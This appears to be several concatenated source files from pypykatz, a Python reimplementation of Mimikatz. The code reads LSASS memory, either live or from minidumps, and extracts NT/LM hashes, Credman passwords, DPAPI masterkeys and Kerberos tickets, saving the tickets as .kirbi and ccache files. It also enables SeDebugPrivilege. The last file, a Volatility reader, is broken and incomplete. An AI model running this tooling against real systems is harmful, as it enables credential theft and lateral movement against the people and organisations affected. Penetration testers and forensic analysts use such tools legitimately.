from asn1crypto import core
from pypykatz.commons.filetime import *
from pypykatz.commons.common import *
from pypykatz.commons.win_datatypes import *
from minikerberos.asn1_structs import *
from minikerberos.constants import *

import enum
import os
import hashlib

class KerberosTicketType(enum.Enum):
	TGT = enum.auto()
	TGS = enum.auto()
	CLIENT = enum.auto() #?
	
class KerberosSessionKey:
	def __init__(self):
		self.keydata = None
		self.sessionkey = None
		
	def parse(key_struct, sysinfo):
		ksk = KerberosSessionKey()
		ksk.keydata = key_struct.Data
		
		if sysinfo.buildnumber < WindowsBuild.WIN_10_1507.value or key_struct.Length < LSAISO_DATA_BLOB.size:
			ksk.sessionkey = ksk.keydata
		else:
			reader = GenericReader(ksk.keydata, processor_architecture = sysinfo.architecture)
			if key_struct.Length <= (LSAISO_DATA_BLOB.size + len("KerberosKey")-1 + 32) :
				blob = LSAISO_DATA_BLOB(reader)
				blob.Data = reader.read(-1)
			else:
				blob = ENC_LSAISO_DATA_BLOB(reader)
				blob.Data = reader.read(-1)
			
			ksk.sessionkey = blob.Data
		return ksk
	
class KerberosTicket:
	def __init__(self):
		self.type = None
		self.ServiceName = None
		self.ServiceName_type = None
		self.DomainName = None
		self.ETargetName = None
		self.ETargetName_type = None
		self.TargetDomainName = None
		self.EClientName = None
		self.EClientName_type = None
		self.AltTargetDomainName = None
		self.Description = None

		self.StartTime = None
		self.EndTime = None
		self.RenewUntil = None

		self.KeyType = None
		self.Key = None

		self.TicketFlags = None
		self.TicketEncType = None
		self.TicketKvno = None
		self.Ticket = None
		
		self.kirbi_data = {}
		self.session_key = None
		
	def generate_filename(self):
		return '%s@%s_%s' % ('-'.join(self.EClientName) , '-'.join(self.ServiceName), hashlib.sha1(self.Ticket).hexdigest()[:8])
	
	def to_dict(self):
		#not sure if anyone would need this, so only parts will be shown
		t = {}
		t['type'] = self.type
		t['ServiceName'] = self.ServiceName
		t['DomainName'] = self.DomainName
		t['ETargetName'] = self.ETargetName
		t['TargetDomainName'] = self.TargetDomainName
		t['EClientName'] = self.EClientName
		t['AltTargetDomainName'] = self.AltTargetDomainName
		t['StartTime'] = self.StartTime
		t['EndTime'] = self.EndTime
		t['RenewUntil'] = self.RenewUntil
		t['KeyType'] = self.KeyType
		t['Key'] = self.Key
		
		return t
		
	
	def to_asn1(self):
		krbcredinfo = {}
		krbcredinfo['key'] = EncryptionKey({'keytype': self.KeyType, 'keyvalue':self.Key})
		krbcredinfo['prealm'] = self.AltTargetDomainName
		krbcredinfo['pname'] = PrincipalName({'name-type': self.EClientName_type, 'name-string':self.EClientName})
		krbcredinfo['flags'] = core.IntegerBitString(self.TicketFlags).cast(TicketFlags)
		krbcredinfo['starttime'] = self.StartTime
		krbcredinfo['endtime'] = self.EndTime
		krbcredinfo['renew-till'] = self.RenewUntil
		krbcredinfo['srealm'] = self.DomainName
		krbcredinfo['sname'] = PrincipalName({'name-type': self.ServiceName_type, 'name-string':self.ServiceName})
		
		enc_krbcred = {}
		enc_krbcred['ticket-info'] = [KrbCredInfo(krbcredinfo)]
		
		ticket = {}
		ticket['tkt-vno'] = krb5_pvno
		ticket['realm'] = self.DomainName
		ticket['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string':self.ServiceName})
		ticket['enc-part'] = EncryptedData({'etype': self.TicketEncType, 'kvno': self.TicketKvno, 'cipher': self.Ticket})
		
		krbcred = {}
		krbcred['pvno'] = krb5_pvno
		krbcred['msg-type'] = MESSAGE_TYPE.KRB_CRED.value
		krbcred['tickets'] = [Ticket(ticket)]
		krbcred['enc-part'] = EncryptedData({'etype': EncryptionType.NULL.value, 'cipher': EncKrbCredPart(enc_krbcred).dump()})
	
		return KRBCRED(krbcred)
		
	def parse(kerberos_ticket, reader, sysinfo, type = None):
		kt = KerberosTicket()
		kt.type = type
		kt.ServiceName_type = kerberos_ticket.ServiceName.read(reader).NameType
		kt.ServiceName = kerberos_ticket.ServiceName.read(reader).read(reader)
		kt.DomainName = kerberos_ticket.DomainName.read_string(reader)
		if kerberos_ticket.TargetName.read(reader):
			kt.ETargetName = kerberos_ticket.TargetName.read(reader).read(reader)
			kt.ETargetName_type = kerberos_ticket.TargetName.read(reader).NameType 
		kt.TargetDomainName = kerberos_ticket.TargetDomainName.read_string(reader) 
		kt.EClientName = kerberos_ticket.ClientName.read(reader).read(reader)
		kt.EClientName_type = kerberos_ticket.ClientName.read(reader).NameType
		kt.AltTargetDomainName = kerberos_ticket.AltTargetDomainName.read_string(reader)
		kt.Description = kerberos_ticket.Description.read_string(reader)
		
		kt.StartTime = filetime_to_dt(kerberos_ticket.StartTime)
		kt.EndTime = filetime_to_dt(kerberos_ticket.EndTime)
		if kerberos_ticket.RenewUntil == 0:
			kt.RenewUntil = datetime.datetime(1970, 1, 1, 0, 0)
		else:
			kt.RenewUntil = filetime_to_dt(kerberos_ticket.RenewUntil)
		
		kt.KeyType = kerberos_ticket.KeyType
		kt.Key = kerberos_ticket.Key.read(reader)
		kt.session_key = KerberosSessionKey.parse(kerberos_ticket.Key, sysinfo)
		
		kt.TicketFlags = kerberos_ticket.TicketFlags
		kt.TicketEncType = kerberos_ticket.TicketEncType
		kt.TicketKvno = kerberos_ticket.TicketKvno
		kt.Ticket = kerberos_ticket.Ticket.read(reader)
		
		kirbi = kt.to_asn1()
		kt.kirbi_data[kt.generate_filename()] = kirbi
		
		return kt
		
	def generate_filename(self):
		t = '%s' % ('_'.join([self.type.name, self.DomainName, '_'.join(self.EClientName), '_'.join(self.ServiceName), hashlib.sha1(self.Ticket).hexdigest()[:8]]))
		return '%s.kirbi' % t.replace('..','!')
		
	def to_kirbi(self, dir):
		for filename in self.kirbi_data:
			with open(os.path.join(dir, filename), 'wb') as f:
				f.write(self.kirbi_data[filename].dump())
	
	def __str__(self):
		t =  '== Kerberos Ticket ==\n'
		t += 'Type: %s\n'% self.type
		t += 'ServiceName: %s\n'% self.ServiceName
		t += 'DomainName: %s\n'% self.DomainName
		t += 'ETargetName: %s\n'% self.ETargetName
		t += 'TargetDomainName: %s\n'% self.TargetDomainName
		t += 'EClientName: %s\n'% self.EClientName
		t += 'AltTargetDomainName: %s\n'% self.AltTargetDomainName
		t += 'Description: %s\n'% self.Description
		t += 'StartTime: %s\n'% self.StartTime.isoformat()
		t += 'EndTime: %s\n'% self.EndTime.isoformat()
		t += 'RenewUntil: %s\n'% self.RenewUntil.isoformat()
		t += 'KeyType: %s\n'% self.KeyType
		t += 'Key: %s\n'% self.Key
		t += 'TicketFlags: %s\n'% self.TicketFlags
		t += 'TicketEncType: %s\n'% self.TicketEncType
		t += 'TicketKvno: %s\n'% self.TicketKvno
		t += 'Ticket: %s\n'% self.Ticket.hex()	
		t += 'SessionKey: %s\n'% self.session_key.sessionkey.hex()	
	
		return t
		


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

import ctypes
from ctypes import windll
from ctypes.wintypes import ULONG, BOOL,LONG

from .privileges_types import *

STATUS_SUCCESS = 0
NTSTATUS = LONG
POINTER     = ctypes.POINTER

def NtError(status):
	"""
	Converts NTSTATUS codes into WinError codes
	"""
	err = windll.ntdll.RtlNtStatusToDosError(status)
	return ctypes.WinError(err)

# https://source.winehq.org/WineAPI/RtlAdjustPrivilege.html
# BOOL WINAPI RtlAdjustPrivilege(
#   __in   ULONG     Privilege,
#   __in   BOOLEAN   Enable,
#   __in   BOOLEAN   CurrentThread,
#   __in   PBOOLEAN  Enabled,
# );
def RtlAdjustPrivilege(privilige_id):
	"""
	privilige_id: int
	"""
	_RtlAdjustPrivilege = windll.ntdll.RtlAdjustPrivilege
	_RtlAdjustPrivilege.argtypes = [ULONG, BOOL, BOOL, POINTER(BOOL)]
	_RtlAdjustPrivilege.restype  = NTSTATUS

	Enable = True
	CurrentThread = False #enable for whole process
	Enabled = BOOL()
	
	status = _RtlAdjustPrivilege(privilige_id, Enable, CurrentThread, ctypes.byref(Enabled))
	if status != STATUS_SUCCESS:
		raise Exception(NtError(status))
	
	return True
	
def enable_debug_privilege():
    """
    Enables the SE_DEBUG privilege for the currently running process, if the process has SE_DEBUG privilege. (You'll need to be admin most probably)
    """
    RtlAdjustPrivilege(PrivilegeValues.SE_DEBUG.value)
	
if __name__ == '__main__':
	enable_debug_privilege()


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#
import io
import logging
import hashlib
from pypykatz.lsadecryptor.package_commons import *

class DpapiCredential:
	def __init__(self):
		self.credtype = 'dpapi'
		self.luid = None
		self.key_guid = None
		self.masterkey = None
		self.sha1_masterkey = None
	
	def to_dict(self):
		t = {}
		t['credtype'] = self.credtype
		t['key_guid'] = self.key_guid
		t['masterkey'] = self.masterkey
		t['sha1_masterkey'] = self.sha1_masterkey
		t['luid'] = self.luid
		return t
		
	def to_json(self):
		return json.dumps(self.to_dict())
		
	def __str__(self):
		t = '\t== DPAPI [%x]==\n' % self.luid
		t += '\t\tluid %s\n' % self.luid
		t += '\t\tkey_guid %s\n' % self.key_guid
		t += '\t\tmasterkey %s\n' % self.masterkey
		t += '\t\tsha1_masterkey %s\n' % self.sha1_masterkey
		return t
		
class DpapiDecryptor(PackageDecryptor):
	def __init__(self, reader, decryptor_template, lsa_decryptor, sysinfo):
		super().__init__('Dpapi', lsa_decryptor, sysinfo, reader)
		self.decryptor_template = decryptor_template
		self.credentials = []
		

	def find_first_entry(self, modulename):
		position = self.find_signature(modulename,self.decryptor_template.signature)
		ptr_entry_loc = self.reader.get_ptr_with_offset(position + self.decryptor_template.first_entry_offset)
		ptr_entry = self.reader.get_ptr(ptr_entry_loc)
		return ptr_entry, ptr_entry_loc
		
	def add_entry(self, dpapi_entry):
		
		if dpapi_entry.keySize > 0 and dpapi_entry.keySize % 8 == 0:
			dec_masterkey = self.decrypt_password(dpapi_entry.key, bytes_expected = True)
			sha_masterkey = hashlib.sha1(dec_masterkey).hexdigest()
			
			c = DpapiCredential()
			c.luid = dpapi_entry.LogonId
			c.key_guid = dpapi_entry.KeyUid
			c.masterkey = dec_masterkey.hex()
			c.sha1_masterkey = sha_masterkey
			self.credentials.append(c)	
	
	def start(self):
		for modulename in ['lsasrv.dll','dpapisrv.dll']:
			try:
				entry_ptr_value, entry_ptr_loc = self.find_first_entry(modulename)
			except Exception as e:
				self.log('Failed to find structs! Reason: %s' % e)
				continue
			self.reader.move(entry_ptr_loc)
			entry_ptr = self.decryptor_template.list_entry(self.reader)
			self.walk_list(entry_ptr, self.add_entry)


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#
import io
import json
import logging
from pypykatz.commons.common import *
from pypykatz.commons.filetime import *
from pypykatz.commons.win_datatypes import *
from pypykatz.lsadecryptor.packages.msv.templates import *
from pypykatz.lsadecryptor.packages.credman.templates import *
from pypykatz.lsadecryptor.package_commons import *

class MsvCredential:
	def __init__(self):
		self.username = None
		self.domainname = None
		self.NThash = None
		self.LMHash = None
		self.SHAHash = None
		
		
	def to_dict(self):
		t = {}
		t['username'] = self.username
		t['domainname'] = self.domainname
		t['NThash'] = self.NThash
		t['LMHash'] = self.LMHash
		t['SHAHash'] = self.SHAHash
		return t
		
	def to_json(self):
		return json.dumps(self.to_dict(), cls=UniversalEncoder)
		
	def __str__(self):
		t = '\t== MSV ==\n'
		t += '\t\tUsername: %s\n' % (self.username if self.username else 'NA')
		t += '\t\tDomain: %s\n' % (self.domainname if self.domainname else 'NA')
		t += '\t\tLM: %s\n' % (self.LMHash.hex() if self.LMHash else 'NA')
		t += '\t\tNT: %s\n' % (self.NThash.hex() if self.NThash else 'NA')
		t += '\t\tSHA1: %s\n' % (self.SHAHash.hex() if self.SHAHash else 'NA')
		return t
		
class CredmanCredential:
	def __init__(self):
		self.credtype = 'credman'
		self.luid = None
		self.username = None
		self.password = None
		self.domain = None

	def to_dict(self):
		t = {}
		t['credtype'] = self.credtype
		t['username'] = self.username
		t['domain'] = self.domain
		t['password'] = self.password
		t['luid'] = self.luid
		return t
		
	def to_json(self):
		return json.dumps(self.to_dict())
		
	def __str__(self):
		t = '\t== CREDMAN [%x]==\n' % self.luid
		t += '\t\tluid %s\n' % self.luid
		t += '\t\tusername %s\n' % self.username
		t += '\t\tdomain %s\n' % self.domain
		t += '\t\tpassword %s\n' % self.password
		return t
		
		
class LogonSession:
	def __init__(self):
		self.authentication_id = None
		self.session_id = None
		self.username = None
		self.domainname = None
		self.logon_server = None
		self.logon_time = None
		self.sid = None
		self.luid = None
		
		self.msv_creds = []
		self.wdigest_creds = []
		self.ssp_creds = []
		self.livessp_creds = []
		self.dpapi_creds = []
		self.kerberos_creds = []
		self.credman_creds = []
		self.tspkg_creds = []
	
	@staticmethod
	def parse(entry, reader):
		"""
		Converts KIWI_MSV1_0_LIST type objects into a unified class
		"""
		lsc = LogonSession()
		lsc.authentication_id = entry.LocallyUniqueIdentifier
		lsc.session_id = entry.Session
		lsc.username = entry.UserName.read_string(reader)
		lsc.domainname = entry.Domaine.read_string(reader)
		lsc.logon_server = entry.LogonServer.read_string(reader)
		if entry.LogonTime != 0:
			lsc.logon_time = filetime_to_dt(entry.LogonTime).isoformat()
		lsc.sid = str(entry.pSid.read(reader))
		lsc.luid = entry.LocallyUniqueIdentifier
		return lsc
		
	def to_dict(self):
		t = {}
		t['authentication_id'] = self.authentication_id
		t['session_id'] = self.session_id
		t['username'] = self.username
		t['domainname'] = self.domainname
		t['logon_server'] = self.logon_server
		t['logon_time'] = self.logon_time
		t['sid'] = self.sid
		t['luid'] = self.luid
		t['msv_creds']  = []
		t['wdigest_creds']  = []
		t['ssp_creds']  = []
		t['livessp_creds']  = []
		t['dpapi_creds']  = []
		t['kerberos_creds']  = []
		t['credman_creds']  = []
		t['tspkg_creds']  = []
		for cred in self.msv_creds:
			t['msv_creds'].append(cred.to_dict())
		for cred in self.wdigest_creds:
			t['wdigest_creds'].append(cred.to_dict())
		for cred in self.ssp_creds:
			t['ssp_creds'].append(cred.to_dict())
		for cred in self.livessp_creds:
			t['livessp_creds'].append(cred.to_dict())
		for cred in self.dpapi_creds:
			t['dpapi_creds'].append(cred.to_dict())
		for cred in self.kerberos_creds:
			t['kerberos_creds'].append(cred.to_dict())
		for cred in self.credman_creds:
			t['credman_creds'].append(cred.to_dict())
		for cred in self.tspkg_creds:
			t['tspkg_creds'].append(cred.to_dict())
		return t
		
	def to_json(self):
		return json.dumps(self.to_dict(), cls=UniversalEncoder)
	
	def __str__(self):
		t = '== LogonSession ==\n'
		t += 'authentication_id %s (%x)\n' % (self.authentication_id, self.authentication_id)
		t += 'session_id %s\n' % self.session_id
		t += 'username %s\n' % self.username
		t += 'domainname %s\n' % self.domainname
		t += 'logon_server %s\n' % self.logon_server
		t += 'logon_time %s\n' % self.logon_time
		t += 'sid %s\n' % self.sid
		t += 'luid %s\n' % self.luid
		if len(self.msv_creds) > 0:
			for cred in self.msv_creds:
				t+= '%s' % str(cred)
		if len(self.wdigest_creds) > 0:
			for cred in self.wdigest_creds:
				t+= str(cred)
		if len(self.ssp_creds) > 0:
			for cred in self.ssp_creds:
				t+= str(cred)
		if len(self.livessp_creds) > 0:
			for cred in self.livessp_creds:
				t+= str(cred)
		if len(self.kerberos_creds) > 0:
			for cred in self.kerberos_creds:
				t+= str(cred)
		if len(self.wdigest_creds) > 0:
			for cred in self.wdigest_creds:
				t+= str(cred)
		if len(self.credman_creds) > 0:
			for cred in self.credman_creds:
				t+= str(cred)
		if len(self.tspkg_creds) > 0:
			for cred in self.tspkg_creds:
				t+= str(cred)
		if len(self.dpapi_creds) > 0:
			for cred in self.dpapi_creds:
				t+= str(cred)
		return t
		
class MsvDecryptor(PackageDecryptor):
	def __init__(self, reader, decryptor_template, lsa_decryptor, credman_template, sysinfo):
		super().__init__('Msv', lsa_decryptor, sysinfo, reader)
		self.decryptor_template = decryptor_template
		self.credman_decryptor_template = credman_template
		self.entries = []
		self.entries_seen = {}
		self.logon_sessions = {}
		
		self.current_logonsession = None

	def find_first_entry(self):
		position = self.find_signature('lsasrv.dll',self.decryptor_template.signature)
		ptr_entry_loc = self.reader.get_ptr_with_offset(position + self.decryptor_template.first_entry_offset)
		ptr_entry = self.reader.get_ptr(ptr_entry_loc)
		return ptr_entry, ptr_entry_loc
	
	def add_entry(self, entry):
		self.current_logonsession = LogonSession.parse(entry, self.reader)
		if entry.CredentialManager.value != 0:
			self.parse_credman_credentials(entry)
		
		if entry.Credentials_list_ptr.value != 0:			
			self.walk_list(entry.Credentials_list_ptr, self.add_credentials)
		else:
			self.log('No credentials in this structure!')
		
		self.logon_sessions[self.current_logonsession.luid] = self.current_logonsession
		
	def add_credentials(self, primary_credentials_list_entry):
		self.walk_list(
			primary_credentials_list_entry.PrimaryCredentials_ptr, 
			self.add_primary_credentials
		)
		
	def parse_credman_credentials(self, logon_session):
		self.log_ptr(logon_session.CredentialManager.value, 'KIWI_CREDMAN_SET_LIST_ENTRY')
		credman_set_list_entry = logon_session.CredentialManager.read(self.reader, override_finaltype = KIWI_CREDMAN_SET_LIST_ENTRY)
		self.log_ptr(credman_set_list_entry.list1.value, 'KIWI_CREDMAN_LIST_STARTER')
		list_starter = credman_set_list_entry.list1.read(self.reader, override_finaltype = KIWI_CREDMAN_LIST_STARTER)
		if list_starter.start.value != list_starter.start.location:
			self.walk_list(list_starter.start, self.add_credman_credential, override_ptr = self.credman_decryptor_template.list_entry)
		
	def add_credman_credential(self, credman_credential_entry):
		
		c = CredmanCredential()
		c.username = credman_credential_entry.user.read_string(self.reader)
		c.domainname = credman_credential_entry.server2.read_string(self.reader)
		
		if credman_credential_entry.cbEncPassword and credman_credential_entry.cbEncPassword != 0:
			enc_data = credman_credential_entry.encPassword.read_raw(self.reader, credman_credential_entry.cbEncPassword)
			c.password = self.decrypt_password(enc_data)
		
		c.luid = self.current_logonsession.luid
			
		self.current_logonsession.credman_creds.append(c)
		
	
	def add_primary_credentials(self, primary_credentials_entry):
		
		encrypted_credential_data = primary_credentials_entry.encrypted_credentials.read_data(self.reader)
		
		self.log('Encrypted credential data \n%s' % hexdump(encrypted_credential_data))
		self.log('Decrypting credential structure')
		dec_data = self.decrypt_password(encrypted_credential_data, bytes_expected = True)
		self.log('%s: \n%s' % (self.decryptor_template.decrypted_credential_struct.__name__, hexdump(dec_data)))
			
		if len(dec_data) == MSV1_0_PRIMARY_CREDENTIAL_STRANGE_DEC.size and dec_data[4:8] == b'\xcc\xcc\xcc\xcc':
			creds_struct = MSV1_0_PRIMARY_CREDENTIAL_STRANGE_DEC(GenericReader(dec_data, self.sysinfo.architecture))
		else:
			creds_struct = self.decryptor_template.decrypted_credential_struct(GenericReader(dec_data, self.sysinfo.architecture))
		
		
		cred = MsvCredential()
		
		if creds_struct.UserName:
			try:
				cred.username = creds_struct.UserName.read_string(reader)
			except Exception as e:
				self.log('Failed to get username')
		if creds_struct.LogonDomainName:
			try:
				cred.domainname = creds_struct.LogonDomainName.read_string(reader)
			except Exception as e:
				self.log('Failed to get username')
				
		cred.NThash = creds_struct.NtOwfPassword
		
		if creds_struct.LmOwfPassword and creds_struct.LmOwfPassword != b'\x00'*16:
			cred.LMHash = creds_struct.LmOwfPassword
		cred.SHAHash = creds_struct.ShaOwPassword		
		
		self.current_logonsession.msv_creds.append(cred)
	
	def start(self):
		entry_ptr_value, entry_ptr_loc = self.find_first_entry()
		self.reader.move(entry_ptr_loc)
		entry_ptr = self.decryptor_template.list_entry(self.reader)
		self.walk_list(entry_ptr, self.add_entry)




#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

import io
import os
import re
import struct
import logging
import traceback
import json
import ntpath


from pypykatz.pypykatz import pypykatz
from pypykatz.commons.common import UniversalEncoder

def main():
	import argparse
	import glob

	parser = argparse.ArgumentParser(description='Pure Python implementation of Mimikatz --or at least some parts of it--')
	parser.add_argument('-v', '--verbose', action='count', default=0)
	parser.add_argument('--json', action='store_true',help = 'Print credentials in JSON format')
	parser.add_argument('-e','--halt-on-error', action='store_true',help = 'Stops parsing when a file cannot be parsed')
	parser.add_argument('-o', '--outfile', help = 'Save results to file (you can specify --json for json file, or text format will be written)')
	parser.add_argument('-k', '--kerberos-dir', help = 'Save kerberos tickets to a directory.')

	subparsers = parser.add_subparsers(help = 'commands')
	subparsers.required = True
	subparsers.dest = 'command'
	
	minidump_group = subparsers.add_parser('minidump', help='List all tickets in the file')
	minidump_group.add_argument('minidumpfile', help='path to the minidump file or a folder (if -r is set)')
	minidump_group.add_argument('-r', '--recursive', action='store_true', help = 'Recursive parsing')
	minidump_group.add_argument('-d', '--directory', action='store_true', help = 'Parse all dump files in a folder')
	
	
	live_group = subparsers.add_parser('live', help='List all tickets in the file')
	live_subparsers = live_group.add_subparsers(help = 'module')
	live_subparsers.required = True
	live_subparsers.dest = 'module'
	live_subparser_lsa_group = live_subparsers.add_parser('lsa', help='List all tickets in the file')
	
	####### PARSING ARGUMENTS
	
	args = parser.parse_args()
	
	
	###### VERBOSITY
	if args.verbose == 0:
		logging.basicConfig(level=logging.INFO)
	elif args.verbose == 1:
		logging.basicConfig(level=logging.DEBUG)
	else:
		level = 5 - args.verbose
		logging.basicConfig(level=level)
	
	##### Common obj
	results = {}
	files_with_error = []
	
	
	###### Live 
	if args.command == 'live':
		if args.module == 'lsa':
			filename = 'live'
			try:
				mimi = pypykatz.go_live()
				results['live'] = mimi
			except Exception as e:
				files_with_error.append(filename)
				if args.halt_on_error == True:
					raise e
				else:
					print('Exception while dumping LSA credentials from memory. Reason: %s' % e)
					pass
		
	###### Minidump
	elif args.command == 'minidump':		
		if args.directory:
			dir_fullpath = os.path.abspath(args.minidumpfile)
			file_pattern = '*.dmp'
			if args.recursive == True:
				globdata = os.path.join(dir_fullpath, '**', file_pattern)
			else:	
				globdata = os.path.join(dir_fullpath, file_pattern)
				
			logging.info('Parsing folder %s' % dir_fullpath)
			for filename in glob.glob(globdata, recursive=args.recursive):
				logging.info('Parsing file %s' % filename)
				try:
					mimi = pypykatz.parse_minidump_file(filename)
					results[filename] = mimi
				except Exception as e:
					files_with_error.append(filename)
					logging.exception('Error parsing file %s ' % filename)
					if args.halt_on_error == True:
						raise e
					else:
						pass
				
		else:
			logging.info('Parsing file %s' % args.minidumpfile)
			try:
				mimi = pypykatz.parse_minidump_file(args.minidumpfile)
				results[args.minidumpfile] = mimi
			except Exception as e:
				logging.exception()
				if args.halt_on_error == True:
					raise e
				else:
					traceback.print_exc()
			

	if args.outfile and args.json:
		with open(args.outfile, 'w') as f:
			json.dump(results, f, cls = UniversalEncoder, indent=4, sort_keys=True)
	
	elif args.outfile:
		with open(args.outfile, 'w') as f:
			for result in results:
				f.write('FILE: ======== %s =======\n' % result)
				
				for luid in results[result].logon_sessions:
					f.write('\n'+str(results[result].logon_sessions[luid]))
				
				if len(results[result].orphaned_creds) > 0:
					f.write('\n== Orphaned credentials ==\n')
					for cred in results[result].orphaned_creds:
						f.write(str(cred))
				
			if len(files_with_error) > 0:
				f.write('\n== Failed to parse these files:\n')
				for filename in files_with_error:
					f.write('%s\n' % filename)
			
	elif args.json:
		print(json.dumps(results, cls = UniversalEncoder, indent=4, sort_keys=True))
	
	else:
		for result in results:
			print('FILE: ======== %s =======' % result)	
			if isinstance(results[result], str):
				print(results[result])
			else:
				for luid in results[result].logon_sessions:
					print(str(results[result].logon_sessions[luid]))
						
				if len(results[result].orphaned_creds) > 0:
					print('== Orphaned credentials ==')
					for cred in results[result].orphaned_creds:
						print(str(cred))
						
				

		if len(files_with_error) > 0:			
			print('\n==== Parsing errors:')
			for filename in files_with_error:
				print(filename)
	
	
	if args.kerberos_dir:
		dir = os.path.abspath(args.kerberos_dir)
		logging.info('Writing kerberos tickets to %s' % dir)
		for filename in results:
			base_filename = ntpath.basename(filename)
			ccache_filename = '%s_%s.ccache' % (base_filename, os.urandom(4).hex()) #to avoid collisions
			results[filename].kerberos_ccache.to_file(os.path.join(dir, ccache_filename))
			for luid in results[filename].logon_sessions:
				for kcred in results[filename].logon_sessions[luid].kerberos_creds:
					for ticket in kcred.tickets:
						ticket.to_kirbi(dir)
						
			for cred in results[filename].orphaned_creds:
				if cred.credtype == 'kerberos':
					for ticket in cred.tickets:
						ticket.to_kirbi(dir)			
	
	

if __name__ == '__main__':
	main()


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#
import io
import logging
from minidump.win_datatypes import *
from pypykatz.commons.common import *
from pypykatz.commons.win_datatypes import *

from pypykatz.lsadecryptor.package_commons import *

class TspkgTemplate(PackageTemplate):
	def __init__(self):
		super().__init__('Tspkg')
		self.signature = None
		self.avl_offset = None
		self.credential_struct = None
		
	@staticmethod
	def get_template(sysinfo):
		template = TspkgTemplate()
		if sysinfo.architecture == KatzSystemArchitecture.X64:
			template.signature = b'\x48\x83\xec\x20\x48\x8d\x0d'
			template.avl_offset = 7
			
			if sysinfo.buildnumber < WindowsBuild.WIN_10_1607.value:
				template.credential_struct = KIWI_TS_CREDENTIAL_x64
				
			elif sysinfo.buildnumber >= WindowsBuild.WIN_10_1607.value:
				template.credential_struct = KIWI_TS_CREDENTIAL_1607_x64
				
			else:
				#currently this doesnt make sense, but keeping it here for future use
				raise Exception('Could not identify template! Architecture: %s Buildnumber: %s' % (self.arch, sysinfo.buildnumber))
			
		
		elif sysinfo.architecture == KatzSystemArchitecture.X86:
			if sysinfo.buildnumber < WindowsMinBuild.WIN_8.value:
				template.signature = b'\x8b\xff\x55\x8b\xec\x51\x56\xbe'
				template.avl_offset = 8
				template.credential_struct = KIWI_TS_CREDENTIAL
				
			elif WindowsMinBuild.WIN_8.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_BLUE.value:
				template.signature = b'\x8b\xff\x53\xbb'
				template.avl_offset = 4
				template.credential_struct = KIWI_TS_CREDENTIAL
				
			elif WindowsMinBuild.WIN_BLUE.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1607.value:
				template.signature = b'\x8b\xff\x57\xbf'
				template.avl_offset = 4
				template.credential_struct = KIWI_TS_CREDENTIAL
				
			elif sysinfo.buildnumber >= WindowsBuild.WIN_10_1607.value:
				template.signature = b'\x8b\xff\x57\xbf'
				template.avl_offset = 4
				template.credential_struct = KIWI_TS_CREDENTIAL_1607
			
		else:
			raise Exception('Unknown architecture! %s' % self.arch)

		template.log_template('credential_struct', template.credential_struct)
			
		return template
	

class PKIWI_TS_PRIMARY_CREDENTIAL(POINTER):
	def __init__(self, reader):
		super().__init__(reader, KIWI_TS_PRIMARY_CREDENTIAL)
	
class KIWI_TS_PRIMARY_CREDENTIAL:
	def __init__(self, reader):
		self.unk0 = PVOID(reader) #	// lock ?
		self.credentials = KIWI_GENERIC_PRIMARY_CREDENTIAL(reader)
	 

class KIWI_TS_CREDENTIAL:
	def __init__(self, reader):
		self.unk0 = reader.read(64)
		self.LocallyUniqueIdentifier = LUID(reader).value
		reader.align()
		self.unk1 = PVOID(reader)
		self.unk2 = PVOID(reader)
		self.pTsPrimary = PKIWI_TS_PRIMARY_CREDENTIAL(reader)
	
class KIWI_TS_CREDENTIAL_x64:
	def __init__(self, reader):
		self.unk0 = reader.read(108) 
		self.LocallyUniqueIdentifier = LUID(reader).value
		reader.align()
		self.unk1 = PVOID(reader)
		self.unk2 = PVOID(reader)
		self.pTsPrimary = PKIWI_TS_PRIMARY_CREDENTIAL(reader)

class KIWI_TS_CREDENTIAL_1607:
	def __init__(self, reader):
		self.unk0 = reader.read(68)
		self.LocallyUniqueIdentifier = LUID(reader).value
		reader.align()
		self.unk1 = PVOID(reader)
		self.unk2 = PVOID(reader)
		self.pTsPrimary = PKIWI_TS_PRIMARY_CREDENTIAL(reader)
	

class KIWI_TS_CREDENTIAL_1607_x64:
	def __init__(self, reader):
		self.unk0 = reader.read(112) 
		self.LocallyUniqueIdentifier = LUID(reader).value
		reader.align()
		self.unk1 = PVOID(reader)
		self.unk2 = PVOID(reader)
		self.pTsPrimary = PKIWI_TS_PRIMARY_CREDENTIAL(reader)

	


# https://github.com/volatilityfoundation/community/blob/master/FrancescoPicasso/mimikatz.py
# https://github.com/TazWake/volatility-plugins/blob/master/ramscan/ramscan.py
import volatility.plugins.common as common
import volatility.utils as utils
import volatility.win32 as win32

class VolatilityVadSegment:
	def __init__(self):
		self.vad = vad
		self.start_address = vad.Start
		self.end_address = vad.End
		self.size = start_address - end_address
		
class VolatilityModule:
	def __init__(self):
		self.name = None
		self.baseaddress = None
		self.size = None
		self.endaddress = None
		
		self.versioninfo = None
		self.checksum = None
		self.timestamp = None
		
		
	def parse(mod):
		"""
		mod: volatility module obje
		buff: file handle
		"""
		mm = VolatilityModule()
		mm.name = mod.FullDllName
		
		mm.baseaddress = mod.DllBase
		mm.size = mod.SizeOfImage
		mm.endaddress = mm.baseaddress + mm.size
		
		mm.checksum = mod.CheckSum
		mm.timestamp = mod.TimeDateStamp
		mm.versioninfo = mod.VersionInfo
		
		return mm
		
	def __str__(self):
		return 'Module name: %s BaseAddress: 0x%08x Size: 0x%x Endaddress: 0x%08x' % (self.name, self.baseaddress, self.size, self.endaddress)

class VolatilityReader:
	def __init__(self):
		self.vads = []
		self.modules = []
		
		
		
	def start(self):
		self.lsass_task = self.find_lsass()
		if not lsass_task:
			debug.error('lsass_task process not found!!')
			return
		
	
	def find_lsass(self):
		addr_space = utils.load_as(self._config)
		for task in tasks.pslist(addr_space):
			if str(task.ImageFileName) == 'lsass.exe':
				return task
		
	def get_vads(self):
		process_space = self.lsass_task.get_process_address_space()
		for vad in task.VadRoot.traverse():
			if vad != None: 
				v = VadSegment(vad)
				self.vads.append(v)
				
				
                data = process_space.read(vad.Start, 1024)
                if vad.u.VadFlags.CommitCharge.v() > 30:
				
	def get_modules(self):
		for mod in self.lsass_task.get_load_modules():
			
		
		
	



